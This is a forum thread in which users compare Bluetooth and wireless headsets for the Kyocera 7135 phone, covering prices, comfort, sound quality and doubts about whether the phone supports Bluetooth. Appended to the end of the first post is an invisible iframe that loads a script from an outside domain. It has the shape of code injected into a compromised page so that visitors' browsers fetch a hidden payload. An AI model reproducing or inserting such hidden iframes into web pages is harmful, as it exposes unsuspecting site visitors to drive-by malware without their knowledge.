Has anyone have (or used) Bluetrek Headset for the 7135? I'm interested in purchasing a wireless headset but want to make sure they work like they say they do. Logitech will have one shortly which they say does the same, but last longer and is about $50.00 cheaper. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I've been using the Jabra headset for about a month now, and I like it. It's most convenient from a fixed location (when the phone is in the cradle at home or mounted in the car) because the adapter takes up some space hanging on your belt or jeans pocket (although it does looks kinda cool).
I had to get used to the delay in connecting to the phone when I pushed the on/off button, and it doesn't seem to be consistent about when you need to "wake up" the phone and when you can just go ahead and "speak a name" when you're dialing out.
But it sure is nice to walk around talking or drive without a dangling wire. I wish it had been $50 cheaper, but ...

I've been trying to find out the exact same thing. With xmas only a month away, either one would be a perfect present to get. It looks like the Bluetrek has more functions, but I haven't found anyone who has one. I'd appreciate if you lemme know if you hear anything.
Since no one has mentioned this in this thread yet...
True Bluetooth (Without adapters) does NOT work with the 7135
I already made the mistake of purchasing a bluetooth SD Card and a bluetooth headset. It seems that this phone does not support the bluetooth stack.
However you can use bluetooth headsets that also have a cable to connect to the 7135, or an adapter that hangs off the phone but that kinda defeats the purpose
The tech stuff is over my head, but I thought that the SD slot was compatible with Bluetooth. In fact, I think some people have been able to get Bluetooth SD cards to work (at least for networking). See thread below... http://www.smartphonesource.com/vbul...tooth+AND+palm
Maybe the problem is with headsets in particular. I believe I've read some posts saying that drivers for headsets are lacking, rather than being a bluetooth problem per se.
I just bought the Bluetrek G2. First impression is that's it doesn't feel very solid on my ear. Kind of loose. Then there's the sound quality. It sounds good receiving, but my outgoing voice (I only checked by leaving a voice message for myself) sounds awful. Extremely muffled sounding. Also, now when I try to connect the dongle, the phone gets stuck in thinking I want to redial the last number, and all phone buttons are locked out unless I unplug the dongle. Am I doing something wrong? Any suggestions would be appreciated.
